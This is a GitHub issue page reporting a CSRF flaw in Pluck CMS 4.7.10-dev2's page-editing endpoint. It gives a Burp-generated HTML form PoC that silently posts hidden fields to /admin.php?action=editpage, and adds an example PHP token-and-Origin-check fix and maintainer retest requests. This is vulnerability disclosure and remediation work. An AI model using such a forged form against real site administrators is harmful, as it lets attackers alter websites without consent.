pluck-cms / pluck

Central repo for pluck cms

Home Page: http://www.pluck-cms.org


An issue was discovered in Pluck 4.7.10-dev2. There is a CSRF vulnerability that can edit a page via /admin.php?action=editpage

F1sh1001 opened this issue · comments

CSRF POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/pluck/admin.php?action=editpage&page=111" method="POST">
      <input type="hidden" name="title" value="evil" />
      <input type="hidden" name="seo&#95;name" value="111" />
      <input type="hidden" name="content" value="evil" />
      <input type="hidden" name="description" value="" />
      <input type="hidden" name="keywords" value="" />
      <input type="hidden" name="hidden" value="no" />
      <input type="hidden" name="sub&#95;page" value="" />
      <input type="hidden" name="theme" value="oldstyle" />
      <input type="hidden" name="save" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

[image]
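One way to close this kind of hole, shown here as an added example that is not pluck's own code: the editpage handler accepts a POST only when it carries a per-session secret that a form hosted on another site cannot know, with an Origin check as a second layer. The function and field names (csrf_token, csrf_is_valid, origin_is_same_site, csrf_token) and the expected host are assumptions for the example.

```php
<?php
// Added example (not pluck's code): synchronizer-token protection for a
// POST handler such as admin.php?action=editpage. Names are hypothetical.
session_start();

// Issue one random token per session and keep the reference copy server-side.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session copy in constant time.
function csrf_is_valid(?string $submitted): bool {
    if (!isset($_SESSION['csrf_token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: a browser adds an Origin header to cross-site form posts,
// so a mismatch can be rejected before the request body is even parsed.
function origin_is_same_site(string $expectedHost): bool {
    $origin = $_SERVER['HTTP_ORIGIN'] ?? '';
    if ($origin === '') { return true; } // some clients omit it; the token still guards
    return parse_url($origin, PHP_URL_HOST) === $expectedHost;
}

$expectedHost = 'www.example.org'; // placeholder: the site's real hostname

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['save'])) {
    if (!origin_is_same_site($expectedHost) || !csrf_is_valid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token; page not saved.');
    }
    // ... the existing editpage save logic runs only after both checks pass ...
}
?>
<!-- The legitimate edit form embeds the token, so only a page served by this
     site (and this session) can produce a submission that passes the check. -->
<form action="admin.php?action=editpage&amp;page=111" method="POST">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="title">
  <input type="submit" name="save" value="Save">
</form>
```

The PoC form above carries no csrf_token field, so a request it produces is refused with 403 and the page is left untouched.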

Where did you insert the script? It is JavaScript, so it only resides in the client.
The /h1 will not appear in the file on disk.

Please explain more.

After the administrator opens the CSRF exp page, a new page called evil will be added to your website.
[image]

Could you please test the latest dev release 4.7.10-dev4?
https://github.com/pluck-cms/pluck/releases/tag/4.7.10-dev4

Have you retested with the latest dev version?